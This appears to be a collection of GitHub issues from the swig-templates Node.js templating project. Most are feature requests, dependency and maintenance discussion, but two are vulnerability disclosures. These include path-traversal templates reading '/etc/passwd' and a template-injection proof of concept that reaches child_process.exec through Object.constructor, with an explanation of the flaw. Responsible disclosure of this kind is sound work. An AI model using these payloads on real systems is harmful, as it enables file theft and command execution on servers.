It seems reasonable to want an "ignore missing" setting that is more general, in other words that can apply everywhere and not need to specify it for each specific use of the "include" tag. Perhaps it should even apply to entire templates that are missing. Why not make it an option to pass to the Swig Options object?

I recently got an error like this in production:

<--- Last few GCs --->

404572803 ms: Mark-sweep 1466.5 (1434.2) -> 1466.3 (1434.2) MB, 1884.6 / 0.0 ms [allocation failure] [GC in old space requested].
404574988 ms: Mark-sweep 1466.3 (1434.2) -> 1484.4 (1403.2) MB, 2184.6 / 0.0 ms [last resort gc].
404577008 ms: Mark-sweep 1484.4 (1403.2) -> 1503.8 (1403.2) MB, 2020.2 / 0.0 ms [last resort gc].

<--- JS stacktrace --->

==== JS stack trace =========================================

Security context: 0x23e3085cfb51 <JS Object>
    2: compiled [/opt/nodeapp/node_modules/swig/lib/swig.js:~608] [pc=0x19961c86ad0e] (this=0x23e3085e6111 <JS Global Object>,locals=0x2a837d238311 <an Object with map 0x382927d71809>)
    3: /* anonymous */ [/opt/nodeapp/node_modules/swig/lib/swig.js:559] [pc=0x199625010ad4] (this=0x23e3085e6111 <JS Global Object>,err=0x23e308504201 <null>,fn=0x2ec2109581f9 <JS Function compiled (SharedFunctio...

 "FATAL ERROR: CALL_AND_RETRY_LAST Allocation failed - JavaScript heap out of memory"

I run node 6.x LTS with the defaults, no extra memory given to V8.

The mention of swig made me suspect something in swig is not releasing memory properly. What do you think?

Several dependencies throw warn or error on install. Would be good to update all the project dependencies to the latest versions.

Hey there!

I'd like to report a security issue but cannot find contact instructions on your repository.

If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.

Thank you for your consideration, and I look forward to hearing from you!

(cc @huntr-helper)

ref this user citation!

There is more life: https://github.com/twigjs/twig.js I think it's better to focus efforts to one project...

https://snyk.io/vuln/SNYK-JS-UGLIFYJS-1727251
[email protected] > [email protected]

uglify-js has addressed this with a fix in v3.14.3. swig-templates needs an update asap as it is using a specific version (2.6.0).

Hi I'm having passing js value inside the swig variable. Is there any way of doing it. Thanks.

Currently I'm doing like this

Thanks.

Every time I make a change to my .html file, I hope to only reload the page to see my changes. However, using swig, I have to restart the server. Is it a bug, or should I configure something additional?

Thanks.

Please set this up: https://travis-ci.org/node-swig/swig
...and make the relevant badge update in the README.

the Include tag should be able to find files in multiple places. The solution would seem to be a SwigOpts option that can accept a string or an array of strings for paths in which include would look for a file.

optimist is deprecated and is using an old version of minimist that has a CVE

This is a continuation of the conversation held over on paul's swig branch.

Are there any wanting to take over the primary maintainer position?

jslint is no longer the only option out there in terms of enforcing a style guide. The only requirement is that it must have a command line runner which can accept multiple files. Options are:

• jscs
• standard
• semistandard
• jshint
• eslint

Once chosen, all code will need to be updated to pass the linter (if we change styles). The Makefile and git hooks will also need to be updated.

/cc @cdaringe @Lochlan (carry over from #9)

official doc:

• https://node-swig.github.io/swig-templates/docs/tags/#include
• https://node-swig.github.io/swig-templates/docs/tags/#extends

poc:

1.html
{% extends '../../../../../etc/passwd' %}
{% include '../../../../../etc/passwd' %}

// run.js
var swig = require('swig');
var output = swig.renderFile('/Users/bytedance/Desktop/swig/tpl.html');
console.log(output);

output:

This is a pattern I've seen more and more people start to use in the npm community. Essentially there would be swig-cli which would do all of the command line compiling/minification.

This would enable swig to have zero dependencies.

Because it can't be searched in GitHub.

No node-swig/swig-templates !

See here: https://travis-ci.org/node-swig/swig-templates/builds/156427613#L4

Any idea what's going on here? The travis yaml config looks reasonable to me.

official doc

• https://node-swig.github.io/swig-templates/docs/tags/#include

poc

tpl.html

You need to ensure that the 1.html file exists
{% include "./1.html"+Object.constructor("global.process.mainModule.require('child_process').exec('open -a Calculator.app')")() %} 

or just use /etc/passwd
{% include "/etc/passwd"+Object.constructor("global.process.mainModule.require('child_process').exec('open -a Calculator.app')")() %}

run.js

var swig = require('swig-templates');
var output = swig.renderFile('/Users/bytedance/Desktop/swig/tpl.html');
console.log(output);

the code above will execute open -a Calculator.app command

gif: http://cdn2.pic.y1ng.vip/uPic/2023/02/01/m1-134548_iShot_2023-02-01_13.45.05.gif

Reason

include.js will do some code splicing

the return value will be added to var out

finally the value of out:

_output += _swig.compileFile("/etc/passwd", {resolveFrom: "/Users/bytedance/Desktop/swig/tpl.html"})(_utils.extend({}, _ctx,  + (((((typeof _ctx.Object !== "undefined" && _ctx.Object !== null && _ctx.Object.constructor !== undefined && _ctx.Object.constructor !== null) ? ((typeof _ctx.Object !== "undefined" && _ctx.Object !== null && _ctx.Object.constructor !== undefined && _ctx.Object.constructor !== null) ? _ctx.Object.constructor : "") : ((typeof Object !== "undefined" && Object !== null && Object.constructor !== undefined && Object.constructor !== null) ? Object.constructor : "")) !== null ? ((typeof _ctx.Object !== "undefined" && _ctx.Object !== null && _ctx.Object.constructor !== undefined && _ctx.Object.constructor !== null) ? ((typeof _ctx.Object !== "undefined" && _ctx.Object !== null && _ctx.Object.constructor !== undefined && _ctx.Object.constructor !== null) ? _ctx.Object.constructor : "") : ((typeof Object !== "undefined" && Object !== null && Object.constructor !== undefined && Object.constructor !== null) ? Object.constructor : "")) : "" ) || _fn).call((((typeof _ctx.Object !== "undefined" && _ctx.Object !== null) ? ((typeof _ctx.Object !== "undefined" && _ctx.Object !== null) ? _ctx.Object : "") : ((typeof Object !== "undefined" && Object !== null) ? Object : "")) !== null ? ((typeof _ctx.Object !== "undefined" && _ctx.Object !== null) ? ((typeof _ctx.Object !== "undefined" && _ctx.Object !== null) ? _ctx.Object : "") : ((typeof Object !== "undefined" && Object !== null) ? Object : "")) : "" ), "global.process.mainModule.require('child_process').exec('open -a Calculator.app')") || _fn)()));

the out will be used to make an anonymous function, and then call the function

if you debug in detail, you will find that it will call the following anonymous funciton:

(function anonymous(
) {
global.process.mainModule.require('child_process').exec('open -a Calculator.app')
})

A specific version of uglify-js is used but a ^ or ~ should be used so it's easier to control versions and allow sharing across modules.

It would be nice to have this function
{{ something ? 'yes' : 'no' }}
or
{{ something ?: 'no' }}

Is it support async call for function from template?
Something like this.
https://stackoverflow.com/questions/47955502/node-js-swig-is-it-support-async-function

"aaa;bbb"|split(";")
// => ["aaa","bbb"]

http://node-swig.github.io/swig-templates/docs/filters/#join
http://twig.sensiolabs.org/doc/filters/split.html

Currently, the latest version published to npm is 2.0.1, but the package.json in master currently has version: "2.0.0".

What's going on?

Like this block

Instead of just having NOT CURRENTLY MAINTAINED, how about having it point here. Also - I am definitely willing to put some time in here, love Swig, so if you are taking on any team members I would be happy to join and throw a couple of hours into bug-fixes/improvements.

Lots of updates needed, lots of ignored PRs and issues. Is anybody maintaining this any more?

As of this writing we're using a makefile to build this project. However, we agree that a makefile build isn't particularly "node-like"—so let's consider alternatives!

@cdaringe @paulcpederson

Hey there,
I hope you don't mind me asking this here, wasn't sure wether SO is the right place or not, but I am currently trying to figure out why swig doesn't accept my date call inside a loop, like this:

{% for post in collections.posts %}
  ...
    <span class="post-date">{{ post.date | date('d M Y') }}</span>
  ...
{% endfor %}

This gives me Unable to parse "post.date | date('d M Y')", while outside of loops / everywhere else it's just working fine. Background: I'm using metalsmith and have this problem with both swig and swig-templates. If I am missing something obvious: don't mind me asking, I'm still learning 🍦

it's hard to find this package! googling it, even with a bunch of keywords, still gets you to paul's original project.

• update paularmstrong's docs to point to our docs
• update swig npm packages to point to our community package

i know paul has demonstrated some reluctance to let go of the reigns. getting his help here would be a big step in realization that the project is alive and kickin'

like: {% for i in 0..10 %}
http://twig.sensiolabs.org/doc/tags/for.html